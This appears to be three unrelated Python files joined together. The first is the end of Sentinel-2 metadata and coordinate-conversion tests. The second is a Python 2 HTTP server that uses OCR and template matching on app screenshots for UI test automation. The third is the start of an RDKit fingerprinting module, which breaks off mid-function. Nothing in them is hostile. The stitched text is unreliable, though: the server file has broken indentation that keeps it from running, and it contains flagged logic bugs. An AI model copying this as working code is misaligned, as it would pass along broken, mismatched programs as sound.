            product = metadata_to_dict(xml)
        assert isinstance(product, OrderedDict)
        assert 'band_list' in product
        assert 'tiles' in product
        assert product['spacecraft_name'] == 'Sentinel-2A'
        assert len(product['band_list']) == 13
        tiles = list(iterkeys(product['tiles']))
        assert len(tiles) == 1

    def test_tile_metadata(self):
        """tileInfo.json merges with product metadata into tile metadata."""
        tile_info = self._load_tile_info()
        tile = tile_metadata(tile_info, metadata_to_dict('tests/samples/metadata.xml'))
        self._assert_expected_tile(tile)

    def test_tile_metadata_with_geometry_check(self):
        """tile_metadata accepts an optional geometry_check callback."""
        def geometry_check(meta):
            # Reject tiles in latitude band 'N' (exercises the callback path).
            if meta['latitude_band'] == 'N':
                return False
            return True
        tile_info = self._load_tile_info()
        tile = tile_metadata(tile_info, metadata_to_dict('tests/samples/metadata.xml'), geometry_check)
        self._assert_expected_tile(tile)

    def test_to_latlon_edge_of_coordinate_system(self):
        """UTM zone 1 coordinates at the edge of the system convert sanely."""
        geojson = {
            "type": "Polygon",
            "crs": {
                "type": "name",
                "properties": {
                    "name": "urn:ogc:def:crs:EPSG:8.8.1:32601"
                }
            },
            "coordinates": [[
                [336706.875271381, 7799999.0],
                [409799.0, 7799999.0],
                [409799.0, 7690201.0],
                [300001.0, 7690201.0],
                [300001.0, 7728957.392986406],
                [315164.079827873, 7758207.990416902],
                [330501.865974295, 7787926.032465892],
                [336706.875271381, 7799999.0],
            ]],
        }
        gj = to_latlon(copy(geojson))
        self.assertNotEqual(gj['coordinates'][0][0], geojson['coordinates'][0][0])
        self.assertAlmostEqual(gj['coordinates'][0][1][0], 180.60306, 4)

    def test_to_latlon(self):
        """UTM polygon coordinates are converted to lat/lon in place."""
        geojson = {
            'type': 'Polygon',
            'coordinates': [
                [
                    [448938.374906865, 2500019.0],
                    [509759.0, 2500019.0],
                    [509759.0, 2390221.0],
                    [424439.204990156, 2390221.0],
                    [430306.260834363, 2416547.808440298],
                    [444965.351229892, 2482150.64898733],
                    [448938.374906865, 2500019.0]
                ]
            ],
            'crs': {'type': 'name', 'properties': {'name': 'urn:ogc:def:crs:EPSG:8.8.1:32632'}}
        }
        gj = to_latlon(copy(geojson))
        assert gj['coordinates'][0][0] != geojson['coordinates'][0][0]

    def test_get_tile_geometry(self):
        """Tile and data geometries are extracted from sample JP2 rasters."""
        tiles = {
            'partial_right': {
                'path': 'tests/samples/B01_right.jp2',
                'tile': [-75.3723, -74.8924],
                'data': [-75.0555, -75.3723],
                'epsg': 32618
            },
            'partial_left': {
                'path': 'tests/samples/B01_left.jp2',
                'tile': [-62.1004, -61.113],
                'data': [-62.1002, -62.0978],
                'epsg': 32620
            },
            'full': {
                'path': 'tests/samples/B01_full.jp2',
                'tile': [-67.4893, -67.4893],
                'data': [-67.4893, -67.4893],
                'epsg': 32620
            },
            'edge_case': {
                'path': 'tests/samples/B01_multi.jp2',
                'tile': [-69.0002, -68.8339],
                'data': [-68.9683, -68.8339],
                'epsg': 32619
            },
        }
        for t in iterkeys(tiles):
            print(t)
            (tile, data) = get_tile_geometry(tiles[t]['path'], tiles[t]['epsg'])
            fc = {
                'type': 'FeatureCollection',
                'features': []
            }
            for g in [data]:
                f = {
                    'type': 'Feature',
                    'properties': {},
                    'geometry': g
                }
                fc['features'].append(f)
            # # uncomment to write the results to disk for testing
            # f = open('test_%s.geojson' % t, 'w')
            # f.write(json.dumps(fc))
            for i in range(0, 2):
                self.assertEqual(tiles[t]['tile'][i], round(tile['coordinates'][0][i][0], 4))
                self.assertEqual(tiles[t]['data'][i], round(data['coordinates'][0][i][0], 4))
|
|
#!/usr/bin/python
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import numpy as np
from urlparse import parse_qs
from PIL import Image
from io import BytesIO
import base64
from CharInfo import CharInfo
from LocInfo import LocInfo
from Point import Point
import sys
import math
from PIL import ImageFilter
import cv2
import imutils
try:
from ImageService import image_to_string
except ImportError:
from pytesseract.pytesseract import image_to_string
# Deep recursion is used by the flood fill in findGreen; raise the limit so
# large highlight regions do not overflow the default stack depth.
sys.setrecursionlimit(100000)
# TCP port the image-recognition HTTP service listens on.
PORT_NUMBER = 6666
# macOS account name used to build /Users/<USER>/Desktop debug-output paths.
# USER = "hoangpx"
USER = "Automation"
# This class handles any incoming request from
# the browser
class myHandler(BaseHTTPRequestHandler):
def find_image_zoom(self, imageBefore, imageAfter, threadhold):
    """Estimate the zoom ratio between two base64-encoded screenshots.

    The "after" image is used as a template, resized over a range of
    scales, and template-matched against the "before" image; the ratio of
    the template's original width to the resized width is returned.
    """
    # convert both images to gray
    openCVImageBefore = Image.open(BytesIO(base64.b64decode(imageBefore)))
    image_before = cv2.cvtColor(np.array(openCVImageBefore), cv2.COLOR_RGB2BGR)
    gray_image = cv2.cvtColor(image_before, cv2.COLOR_BGR2GRAY)
    openCVImageAfter = Image.open(BytesIO(base64.b64decode(imageAfter)))
    template = cv2.cvtColor(np.array(openCVImageAfter), cv2.COLOR_RGB2BGR)
    template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
    list_result = []
    # cv2.imwrite('/Users/'+USER+'/Desktop/image_before.png', image_before)
    # cv2.imwrite('/Users/'+USER+'/Desktop/template.png', template)
    for scale in np.linspace(1.0, 0.1, 100)[::-1]:
        resized_image = imutils.resize(template, width=int(template.shape[1] * scale))
        zoom_scale = template.shape[1] / float(resized_image.shape[1])
        result = cv2.matchTemplate(gray_image, resized_image, cv2.TM_CCOEFF_NORMED)
        w, h = resized_image.shape[::-1]
        loc = np.where(result >= float(threadhold))
        for pt in zip(*loc[::-1]):
            # Deduplicate hits that overlap an already-recorded match.
            isValid = True
            for point in list_result:
                if (abs(point[0] - pt[0]) < w) and (abs(point[1] - pt[1]) < h):
                    isValid = False
                    break
            if isValid is True:
                list_result.insert(0, pt)
                cv2.rectangle(image_before, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 2)
        # cv2.imwrite('/Users/'+USER+'/Desktop/scaled.png', image_before)
        # NOTE(review): this returns unconditionally on the first scale
        # iteration, so only one scale is ever evaluated — confirm whether
        # the return was meant to be conditional on a match being found.
        return zoom_scale
    return 0
def isolateColor(self, source_image):
    """Mask `source_image` down to its green-ish pixels.

    NOTE(review): the masked result `res` is computed but neither returned
    nor stored, so this method currently has no observable effect beyond
    the commented-out debug write — confirm whether it should return res.
    """
    # NOTE(review): despite the variable name, this converts RGB->BGR,
    # not to HSV.
    hsv = cv2.cvtColor(source_image, cv2.COLOR_RGB2BGR)
    lower_green = np.array([0, 128, 0])
    upper_green = np.array([128, 256, 128])
    mask = cv2.inRange(hsv, lower_green, upper_green)
    res = cv2.bitwise_and(source_image, source_image, mask=mask)
    # cv2.imwrite('/Users/'+USER+'/Desktop/res.png', res)
def matching_image(self, source_image, gray_image, template_image, threshold):
    """Template-match `template_image` against `gray_image`.

    Draws a red rectangle on `source_image` around each distinct match,
    writes the annotated image to the desktop for debugging, and returns
    the list of match-center (x, y) coordinates.
    """
    img2 = gray_image.copy()
    w, h = template_image.shape[::-1]
    res = cv2.matchTemplate(img2, template_image, cv2.TM_CCOEFF_NORMED)
    loc = np.where(res >= float(threshold))
    count = 0
    list_result = []
    locations = []
    for pt in zip(*loc[::-1]):
        # Deduplicate hits that overlap (within one template size of) an
        # already-recorded match.
        isValid = True
        for point in list_result:
            if (abs(point[0] - pt[0]) < w) and (abs(point[1] - pt[1]) < h):
                isValid = False
                break
        if isValid is True:
            list_result.insert(0, pt)
            cv2.rectangle(source_image, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 2)
            count += 1
            print (pt[0] + w / 2, pt[1] + h / 2)
            locations.append((pt[0] + w / 2, pt[1] + h / 2))
    cv2.imwrite("/Users/"+USER+"/Desktop/result.png", source_image)
    return locations
def remove_image(self, source_image, template_image):
    """Blot out every occurrence of `template_image` inside `source_image`.

    Each distinct match (threshold fixed at 0.7) is covered with a filled
    black rectangle; the modified image is returned.
    """
    gray_image = cv2.cvtColor(source_image, cv2.COLOR_BGR2GRAY)
    img2 = gray_image.copy()
    w, h = template_image.shape[::-1]
    res = cv2.matchTemplate(img2, template_image, cv2.TM_CCOEFF_NORMED)
    loc = np.where(res >= float(0.7))
    count = 0
    list_result = []
    locations = []
    for pt in zip(*loc[::-1]):
        # Deduplicate hits that overlap an already-recorded match.
        isValid = True
        for point in list_result:
            if (abs(point[0] - pt[0]) < w) and (abs(point[1] - pt[1]) < h):
                isValid = False
                break
        if isValid is True:
            list_result.insert(0, pt)
            # Negative thickness fills the rectangle (here with black).
            cv2.rectangle(source_image, pt, (pt[0] + w, pt[1] + h), (0, 0, 0), -20)
            count += 1
            print (pt[0] + w / 2, pt[1] + h / 2)
            locations.append((pt[0] + w / 2, pt[1] + h / 2))
    return source_image
def get_filepaths(self, directory):
    """Recursively collect the full path of every file under `directory`."""
    file_paths = []
    for root, _dirs, filenames in os.walk(directory):
        # Join root + name to form each full filepath.
        file_paths.extend(os.path.join(root, name) for name in filenames)
    return file_paths
def getTextLocation(self, text, source_image, rectangle, screenSize, attachedResults):
    """OCR the cropped screenshot and locate `text` inside it.

    Returns a list of (x, y) locations expressed as fractions of the full
    screen size. Also fills attachedResults["readText"] with everything the
    OCR read and attachedResults["textSize"] with the matched text's
    diagonal length in pixels (0 when not found).
    """
    locations = []
    # get screenshot size ("width/height")
    size = screenSize.split("/")
    # get rectangle info of cropped image in percent ("x,y,w,h")
    rect = rectangle.split(",")
    # get actual width, height of cropped image
    w, h = source_image.size
    attachedResults["textSize"] = 0
    # convert PIL image into OpenCV Image
    open_cv_image = np.array(source_image)
    # erase airport icons first so they are not mistaken for characters
    airport_image = cv2.imread("ios/airportIcon.png", cv2.IMREAD_GRAYSCALE)
    open_cv_image = self.remove_image(open_cv_image, airport_image)
    # cv2.imwrite('/Users/hoangpx/Desktop/result.png', open_cv_image)
    # Convert RGB to BGR
    open_cv_image = open_cv_image[:, :, ::-1].copy()
    charInfos = []
    # This will increase accuracy of OCR:
    # there are 3 kinds of text color we want to verify
    boundaries = [
        ([0, 78, 0], [40, 255, 40]),  # purple
        ([189, 189, 189], [255, 255, 255]),  # black
        ([0, 150, 150], [60, 255, 255])  # blue
    ]
    # we will filter the image for each color and OCR each filtered pass
    readText = ""
    i = 0
    inverted_image = 255 - open_cv_image
    for (lower, upper) in boundaries:
        # charInfos = []
        # readText = ""
        lower = np.array(lower, dtype="uint8")
        upper = np.array(upper, dtype="uint8")
        # invert color to make the text easier to read
        mask = cv2.inRange(inverted_image, lower, upper)
        output = cv2.bitwise_and(inverted_image, inverted_image, mask=mask)
        gray_image = cv2.cvtColor(output, cv2.COLOR_BGR2GRAY)
        (thresh, im_bw) = cv2.threshold(gray_image, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)
        path = "/Users/"+USER+"/Desktop/" + str(i) + ".png"
        # cv2.imwrite(path, output)
        i = i + 1
        # convert back from opencv image into PIL image
        cv2_im = cv2.cvtColor(im_bw, cv2.COLOR_GRAY2RGB)
        pil_im = Image.fromarray(cv2_im)
        pil_im.save(path)
        readText += self.process_image(pil_im, charInfos)
    # print readText
    if text != "" and text is not None:
        try:
            # match character indices back to per-character box info
            beginMatchIndex = readText.index(text)
            endMatchIndex = beginMatchIndex + (len(text) - 1)
            p1 = charInfos[beginMatchIndex]
            p2 = charInfos[endMatchIndex]
            # calculate text position in cropped image (follow as axis of cropped image)
            locX = ((p2.x2 - p1.x1) / 2) + p1.x1;
            locY = ((p2.y2 - p1.y1) / 2) + (h - p2.y2);
            # calculate position in full screenshot
            offsetX = (int(size[0]) * float(rect[0])) / 100
            offsetY = (int(size[1]) * float(rect[1])) / 100
            x = offsetX + locX
            y = offsetY + locY
            # get size of text (diagonal of the bounding box)
            textSize = int(math.sqrt(math.pow(p2.y2 - p1.y1, 2) + math.pow(p2.x2 - p1.x1, 2)))
            attachedResults["textSize"] = textSize;
            # and convert it to percent
            originalX = float(x) / int(size[0])
            originalY = float(y) / int(size[1])
            locations.append((originalX, originalY))
        except ValueError:
            # text was not found in the OCR output
            print ""
    else:
        print ""
        # print "Get All Text"
    attachedResults["readText"] = readText
    return locations
def getLocationRectangle(self, object, rectangle, screenSize):
    """Convert match locations relative to a cropped region into fractions
    of the full screen.

    `rectangle` is "x,y,w,h" in percent of the screen; `screenSize` is
    "width/height". Returns a list of (x, y) fractions, or "" when
    `object` is empty.
    """
    print(screenSize, rectangle, object)
    locations = []
    size = screenSize.split("/")
    rect = rectangle.split(",")
    if object != "":
        for it in object:
            # each entry looks like "(x, y)": strip parens and split
            tmp = str(it).replace("(", "").replace(")", "")
            loc = tmp.split(",")
            offsetX = (float(size[0]) * float(rect[0])) / 100
            offsetY = (float(size[1]) * float(rect[1])) / 100
            x = offsetX + float(loc[0])
            y = offsetY + float(loc[1])
            originalX = float(x) / float(size[0])
            originalY = float(y) / float(size[1])
            locations.append((originalX, originalY))
        return locations
    else:
        print "Location is nil"
        return ""
def process_image(self, image, charInfos):
    """Run OCR over `image` in box mode.

    Appends one CharInfo (character plus bounding-box coordinates) to
    `charInfos` per readable character and returns the recognized text.
    Non-ASCII characters reported by the OCR engine are skipped.
    """
    # image.filter(ImageFilter.SHARPEN)
    # read all characters on image
    rawText = image_to_string(image, boxes=True)
    # print("OUTPUT :", rawText)
    # split into char by char (one box description per line)
    chars = rawText.split('\n')
    # summarize all characters into text
    readText = ''
    if rawText:
        for char in chars:
            parts = char.split(' ')
            try:
                parts[0].decode('ascii')
                # parts contains: character, bottomLeft pos, topRight pos, 0
                charInfo = CharInfo(parts[0], int(parts[1]), int(parts[2]), int(parts[3]), int(parts[4]))
                charInfos.append(charInfo)
                readText += parts[0][0]
            except UnicodeDecodeError:
                # skip characters that are not ASCII
                print ""
    return readText
def atan2(self, paramVectorY, paramVectorX):
    """Quadrant-aware arctangent of vector (X, Y), using 3.14 for pi.

    Returns the angle in radians, or None when both components are zero
    (direction undefined).
    """
    # Handle the vertical-vector case BEFORE dividing. The original code
    # computed Y/X first, so X == 0 always raised ZeroDivisionError and the
    # intended +/-pi/2 branches below were unreachable (it returned None
    # for every vertical vector, which made callers such as
    # getPointBetweenTwoPoints crash in math.cos/math.sin).
    if paramVectorX == 0:
        if paramVectorY < 0:
            return -3.14 / 2
        elif paramVectorY > 0:
            return 3.14 / 2
        # zero vector: preserve the original "no answer" result
        return None
    tangent = paramVectorY / paramVectorX
    if paramVectorX > 0:
        return math.atan(tangent)
    # paramVectorX < 0: shift the principal value into the correct quadrant.
    if paramVectorY < 0:
        return math.atan(tangent) - 3.14
    return math.atan(tangent) + 3.14
def getPointBetweenTwoPoints(self, paramPoint1, paramPoint2, paramPercent):
    """Return the Point lying paramPercent% of the way from paramPoint1
    to paramPoint2.

    NOTE(review): self.atan2 can return None (zero-length route), which
    would make math.cos/math.sin below raise — confirm callers never pass
    coincident points.
    """
    offsetX = float(paramPoint2.x) - float(paramPoint1.x)
    offsetY = float(paramPoint2.y) - float(paramPoint1.y)
    routeLength = math.sqrt((offsetX * offsetX) + (offsetY * offsetY))
    routeAngle = self.atan2(offsetY, offsetX)
    coordX = paramPoint1.x + (((float(paramPercent) / 100) * routeLength) * math.cos(routeAngle))
    coordY = paramPoint1.y + (((float(paramPercent) / 100) * routeLength) * math.sin(routeAngle))
    return Point(coordX, coordY)
def getParam(self, paramName, fields):
    """Return the first value for paramName from a parse_qs dict, or None."""
    try:
        return fields[paramName][0]
    except KeyError:
        return None
def valueForKey(self, dict, key):
    """Return dict[key], or the string "0" when the key is missing."""
    if key in dict:
        return dict[key]
    return "0"
def findGreen(self, arr, y, x, w, h, locInfo):
    """Recursive flood fill collecting the green region around (x, y).

    Visited green pixels are overwritten with the sentinel [-1, -1, -1] so
    they are not revisited; their coordinates are appended to locInfo.locs
    and locInfo's bounding box (x1/y1, x2/y2) is grown to cover them.
    Relies on the raised sys.setrecursionlimit for large regions.
    """
    # check the neighbourhood around this coordinate
    # (the offset list mixes the 3x3 and 5x5 rings, with some duplicates)
    sides = [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 0], [0, 1], [1, -1], [1, 0], [1, 1], [-2, -2], [-2, -1],
             [-2, 0], [-2, 1], [-2, 2], [-1, -2], [-1, -1], [-1, 0], [-1, 1], [-1, 2], [0, -2], [0, -1], [0, 0],
             [0, 1], [0, 2], [1, -2], [1, -1], [1, 0], [1, 1], [1, 2], [2, -2], [2, -1], [2, 0], [2, 1], [2, 2]]
    for side in sides:
        testX = x + side[0]
        testY = y + side[1]
        if testX < w and testY < h and testX >= 0 and testY >= 0:
            color = arr[testY, testX]
            # green test: first/last channels low, middle channel high
            if color[0] <= 127 and color[1] >= 128 and color[2] <= 127:
                # mark as visited so the recursion terminates
                arr[testY, testX] = [-1, -1, -1]
                locInfo.locs.append([testX, testY])
                # building left-bottom and top-right of bounding box which cover the highlight
                if locInfo.x1 == None or locInfo.x1 > testX:
                    locInfo.x1 = testX
                if locInfo.y1 == None or locInfo.y1 < testY:
                    locInfo.y1 = testY
                if locInfo.x2 == None or locInfo.x2 < testX:
                    locInfo.x2 = testX
                if locInfo.y2 == None or locInfo.y2 > testY:
                    locInfo.y2 = testY
                self.findGreen(arr, testY, testX, w, h, locInfo)
def do_POST(self):
    """Dispatch one POST request to the requested recognition job.

    The form-encoded body selects a "searchType" (image matching, OCR text
    search, route-line check, highlight detection, zoom estimation, or
    color sampling); the computed result is written back as the HTTP
    response body. On unknown/empty input the response is -1.
    """
    result = -1
    try:
        sample_img_uri = None
        text = None
        print "POST"
        content_len = int(self.headers.getheader('content-length', 0))
        post_body = self.rfile.read(content_len)
        fields = parse_qs(post_body)
        if len(fields) > 0:
            # get search type
            searchType = self.getParam("searchType", fields)
            # check if request from IOS or Window
            if self.getParam("isIOS", fields) is None:
                isIOS = False
            else:
                isIOS = True
            if searchType == "image" or searchType == "imageLocation":
                # check if request is getting location of image or not
                isGettingLocation = searchType == "imageLocation"
                # get parameters
                sampleImageName = self.getParam("sampleImageName", fields)
                if sampleImageName is not None:
                    # sample images live in per-platform folders
                    if isIOS:
                        sample_img_uri = "ios/" + sampleImageName
                    else:
                        sample_img_uri = "windows/" + sampleImageName
                    isExist = os.path.isfile(sample_img_uri)
                    print (isExist)
                image = self.getParam("image", fields)
                threshold = self.getParam("threshold", fields)
                screenSize = self.getParam("screenSize", fields)
                rectangle = self.getParam("rectangle", fields)
                occurrences = self.getParam("occurrences", fields)
                source_image = Image.open(BytesIO(base64.b64decode(image)))
                openCVImage = cv2.cvtColor(np.array(source_image), cv2.COLOR_RGB2BGR)
                gray_image = cv2.cvtColor(openCVImage, cv2.COLOR_BGR2GRAY)
                sample_image = cv2.imread(sample_img_uri, cv2.IMREAD_GRAYSCALE)
                numberOfRes = []
                # try to search multiple scale simulator
                scaleValues = [0.33, 0.5, 0.75, 1]
                while len(numberOfRes) == 0:
                    if len(scaleValues) > 0:
                        scaleRate = scaleValues.pop()
                        resizedImage = cv2.resize(sample_image, None, fx=float(scaleRate), fy=float(scaleRate),
                                                  interpolation=cv2.INTER_CUBIC)
                        numberOfRes = self.matching_image(openCVImage, gray_image, resizedImage, threshold)
                    else:
                        break
                if isGettingLocation is True:
                    print ("Getting Image Locations")
                    if rectangle is None:
                        rectangle = "0,0,100,100"
                    print ("numberOfResult: ", len(numberOfRes), " | expected result ")
                    result = self.getLocationRectangle(numberOfRes, rectangle, screenSize)
                else:
                    print ("Searching for image " + sample_img_uri)
                    print ("numberOfResult: ", len(numberOfRes), " | expected result ", occurrences)
                    if len(numberOfRes) == int(occurrences):
                        result = 1
                    else:
                        result = 0
            elif searchType == "text" or searchType == "textLocation" or searchType == "textSize" or searchType == "getAllText":
                text = self.getParam("text", fields)
                screenSize = self.getParam("screenSize", fields)
                image = self.getParam("image", fields)
                rectangle = self.getParam("rectangle", fields)
                source_image = Image.open(BytesIO(base64.b64decode(image)))
                attachedResults = {}
                result = self.getTextLocation(text, source_image, rectangle, screenSize, attachedResults)
                print "Text read is :", attachedResults["readText"]
                if searchType == "textLocation":
                    print ("Getting Text Locations")
                elif searchType == "textSize":
                    print ("Getting Text Size")
                    result = attachedResults["textSize"]
                elif searchType == "getAllText":
                    print ("Getting All Text")
                    result = attachedResults["readText"]
                else:
                    print ("Searching for text " + text)
                    # plain "text" search: succeed if at least one location matched
                    if len(result) > 0:
                        result = 1
                    else:
                        result = 0
            elif searchType == "routeLine":
                routeLine = self.getParam("routeLine", fields)
                image = self.getParam("image", fields)
                source_image = Image.open(BytesIO(base64.b64decode(image)))
                openCVImage = cv2.cvtColor(np.array(source_image), cv2.COLOR_RGB2BGR)
                w, h = source_image.size
                routes = routeLine.split(",")
                x1 = float(routes[0])
                y1 = float(routes[1])
                x2 = float(routes[2])
                y2 = float(routes[3])
                point1 = Point(x1 * w, y1 * h)
                point2 = Point(x2 * w, y2 * h)
                # sample the pixel color at these percentages along the route
                checkValues = [3, 5, 8, 13, 15, 17, 21, 25, 28, 34, 36, 39, 42, 46, 49, 51, 55, 59, 62, 65, 69, 82,
                               85, 89, 91, 97, 99]
                validCount = 0
                for check in checkValues:
                    colorPoint = self.getPointBetweenTwoPoints(point1, point2, check)
                    row = int(colorPoint.y) - 1
                    column = int(colorPoint.x) - 1
                    if row <= 0:
                        row = 0
                    if column <= 0:
                        column = 0
                    color = openCVImage[row, column];
                    if color[0] >= 128 and color[1] <= 127 and color[2] <= 127:
                        validCount += 1
                matchRate = float(validCount) / len(checkValues)
                # consider the route drawn if more than 80% of samples match
                if matchRate > 0.8:
                    result = 1
                else:
                    result = 0
            elif searchType == "highlightLocation":
                image = self.getParam("image", fields)
                source_image = Image.open(BytesIO(base64.b64decode(image)))
                openCVImage = cv2.cvtColor(np.array(source_image), cv2.COLOR_RGB2BGR)
                lower = np.array([0, 128, 0])
                upper = np.array([127, 256, 127])
                shapeMask = cv2.inRange(openCVImage, lower, upper)
                # find the contours in the mask
                _, cnts, _ = cv2.findContours(shapeMask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
                print "I found %d highlight shapes" % (len(cnts))
                print "Getting Highlight Position"
                cv2.imwrite("/Users/" + USER + "/Desktop/before_highlight.png", openCVImage)
                cv2.imwrite("/Users/" + USER + "/Desktop/after_highlight.png", shapeMask)
                result = len(cnts)
            elif searchType == "verifyZoom":
                imageBeforeZoom = self.getParam("imageBeforeZoom", fields)
                imageAfterZoom = self.getParam("image", fields)
                threshold = self.getParam("threshold", fields)
                zoomLevel = self.find_image_zoom(imageBeforeZoom, imageAfterZoom, threshold)
                result = zoomLevel
                print ("zoom scale " + str(result))
            elif searchType == "colorAtLocation":
                image = self.getParam("image", fields)
                screenSize = self.getParam("screenSize", fields)
                rect = self.getParam("colorAt", fields)
                source_image = Image.open(BytesIO(base64.b64decode(image)))
                openCVImage = cv2.cvtColor(np.array(source_image), cv2.COLOR_RGB2BGR)
                #source_image = Image.open("/Users/DuyLD/Desktop/Screen Shot 2016-07-12 at 3.52.04 PM.png")
                self.isolateColor(openCVImage)
                w, h = source_image.size
                # clone color matrix to detect green highlight
                new_list = openCVImage[:]
                # hold current group identifier, just increment by one for next group
                rectangle = rect.split(",")
                # convert to percent
                offsetX = (int(w) * int(rectangle[0])) / 100
                offsetY = (int(h) * int(rectangle[1])) / 100
                result = new_list[offsetY, offsetX]
                print (new_list[offsetY, offsetX] )
            else:
                print "error"
                result = -1
        print "Response : ", result
    except AssertionError:
        # NOTE(review): only AssertionError is caught here; any other failure
        # propagates out of the handler — confirm this is intentional.
        print "St went wrong"
    self.send_response(200)
    self.send_header('Content-type', 'text/html')
    self.end_headers()
    self.wfile.write(result)
    return
try:
    # Create a web server and define the handler to manage the
    # incoming request
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    print 'Started httpserver on port ', PORT_NUMBER
    # Wait forever for incoming HTTP requests
    server.serve_forever()
except KeyboardInterrupt:
    # Ctrl-C: release the listening socket before exiting.
    print '^C received, shutting down the web server'
    server.socket.close()
|
|
#
# Copyright (c) 2003-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" utility functionality for fingerprinting sets of molecules
includes a command line app for working with fingerprints
and databases
Sample Usage:
python FingerprintMols.py -d data.gdb \
-t 'raw_dop_data' --smilesName="Structure" --idName="Mol_ID" \
--outTable="daylight_sig"
"""
import getopt
import sys
from rdkit import Chem
from rdkit import DataStructs
from rdkit.Chem import MACCSkeys
from rdkit.ML.Cluster import Murtagh
import pickle
def error(msg):
  """Write *msg* (an error report) to stderr; the caller supplies any newline."""
  sys.stderr.write(msg)
def message(msg):
  """Write a progress/status *msg* to stderr; the caller supplies any newline."""
  sys.stderr.write(msg)
def GetRDKFingerprint(mol):
  """Fingerprint *mol* using a default FingerprinterDetails configuration."""
  defaults = FingerprinterDetails()
  return FingerprintMol(mol, **vars(defaults))
def FoldFingerprintToTargetDensity(fp, **fpArgs):
  """Repeatedly halve *fp* until its on-bit density reaches fpArgs['tgtDensity'].

  Folding stops early rather than shrink the fingerprint below
  fpArgs['minSize'] bits.  Returns the (possibly folded) fingerprint.
  """
  tgtDensity = fpArgs['tgtDensity']
  minSize = fpArgs['minSize']
  while float(fp.GetNumOnBits()) / fp.GetNumBits() < tgtDensity:
    if fp.GetNumBits() / 2 <= minSize:
      # one more fold would make the fingerprint too small; give up
      break
    fp = DataStructs.FoldFingerprint(fp, 2)
  return fp
def FingerprintMol(mol, fingerprinter=Chem.RDKFingerprint, **fpArgs):
  """Fingerprint a single molecule.

  The default RDKit fingerprinter is called with its standard positional
  arguments pulled out of *fpArgs*; any other fingerprinter is called with
  *fpArgs* as keywords and the result folded to the target density.
  Falls back to FingerprinterDetails defaults when *fpArgs* is empty.
  """
  if not fpArgs:
    fpArgs = FingerprinterDetails().__dict__
  if fingerprinter == Chem.RDKFingerprint:
    return fingerprinter(mol, fpArgs['minPath'], fpArgs['maxPath'], fpArgs['fpSize'],
                         fpArgs['bitsPerHash'], fpArgs['useHs'], fpArgs['tgtDensity'],
                         fpArgs['minSize'])
  # custom fingerprinters take keyword arguments and are folded afterwards
  fp = fingerprinter(mol, **fpArgs)
  return FoldFingerprintToTargetDensity(fp, **fpArgs)
def FingerprintsFromSmiles(dataSource, idCol, smiCol, fingerprinter=Chem.RDKFingerprint,
                           reportFreq=10, maxMols=-1, **fpArgs):
  """Fingerprint every parseable SMILES row of *dataSource*.

  Each entry is indexed for its id (*idCol*) and SMILES (*smiCol*); *fpArgs*
  is forwarded to the fingerprinter.  Progress is reported every
  *reportFreq* successes and processing stops after *maxMols* successes
  when that is positive.  Returns a list of (ID, fingerprint) 2-tuples.
  """
  res = []
  nDone = 0
  for entry in dataSource:
    ID = str(entry[idCol])
    smi = str(entry[smiCol])
    mol = Chem.MolFromSmiles(smi)
    if mol is None:
      error('Problems parsing SMILES: %s\n' % smi)
      continue
    res.append((ID, FingerprintMol(mol, fingerprinter, **fpArgs)))
    nDone += 1
    if reportFreq > 0 and nDone % reportFreq == 0:
      message('Done %d molecules\n' % (nDone))
    if 0 < maxMols <= nDone:
      break
  return res
def FingerprintsFromMols(mols, fingerprinter=Chem.RDKFingerprint, reportFreq=10, maxMols=-1,
                         **fpArgs):
  """Fingerprint a sequence of (ID, mol) pairs.

  *fpArgs* are passed as keyword arguments to the fingerprinter.  Progress
  is reported every *reportFreq* molecules and processing stops after
  *maxMols* successes when that is positive.

  Returns a list of 2-tuples: (ID, fp)
  """
  res = []
  nDone = 0
  for ID, mol in mols:
    if mol:
      fp = FingerprintMol(mol, fingerprinter, **fpArgs)
      res.append((ID, fp))
      nDone += 1
      if reportFreq > 0 and not nDone % reportFreq:
        message('Done %d molecules\n' % (nDone))
      if maxMols > 0 and nDone >= maxMols:
        break
    else:
      # Bug fix: this branch previously referenced the undefined name `smi`
      # (copied from FingerprintsFromSmiles), raising NameError for any
      # falsy molecule.  There is no SMILES here, so report the ID instead.
      error('Problems fingerprinting molecule: %s\n' % ID)
  return res
def FingerprintsFromPickles(dataSource, idCol, pklCol, fingerprinter=Chem.RDKFingerprint,
                            reportFreq=10, maxMols=-1, **fpArgs):
  """Fingerprint molecules stored as binary pickles in *dataSource*.

  Each entry is indexed for its id (*idCol*) and pickled molecule
  (*pklCol*); *fpArgs* is forwarded to the fingerprinter.  Progress is
  reported every *reportFreq* successes and processing stops after
  *maxMols* successes when that is positive.
  Returns a list of (ID, fingerprint) 2-tuples.
  """
  res = []
  nDone = 0
  for entry in dataSource:
    ID = str(entry[idCol])
    pkl = str(entry[pklCol])
    mol = Chem.Mol(pkl)
    if mol is None:
      error('Problems parsing pickle for ID: %s\n' % ID)
      continue
    res.append((ID, FingerprintMol(mol, fingerprinter, **fpArgs)))
    nDone += 1
    if reportFreq > 0 and nDone % reportFreq == 0:
      message('Done %d molecules\n' % (nDone))
    if 0 < maxMols <= nDone:
      break
  return res
def FingerprintsFromDetails(details, reportFreq=10):
  """Generate fingerprints as configured on a FingerprinterDetails instance.

  Input molecules come from (checked in this order) a database table, a
  SMILES text file, or an SD file.  The resulting fingerprints are
  optionally pickled to details.outFileName and/or written to a database
  table.  Returns the list of (ID, fingerprint) 2-tuples, or None when no
  input source is configured.
  """
  data = None
  if details.dbName and details.tableName:
    # --- input from a database table ---
    from rdkit.Dbase.DbConnection import DbConnect
    from rdkit.Dbase import DbInfo
    from rdkit.ML.Data import DataUtils
    try:
      conn = DbConnect(details.dbName, details.tableName)
    except Exception:
      # NOTE(review): the error is reported but execution continues; the
      # DBToData call below will then fail on its own -- confirm intended.
      import traceback
      error('Problems establishing connection to database: %s|%s\n' % (details.dbName,
                                                                       details.tableName))
      traceback.print_exc()
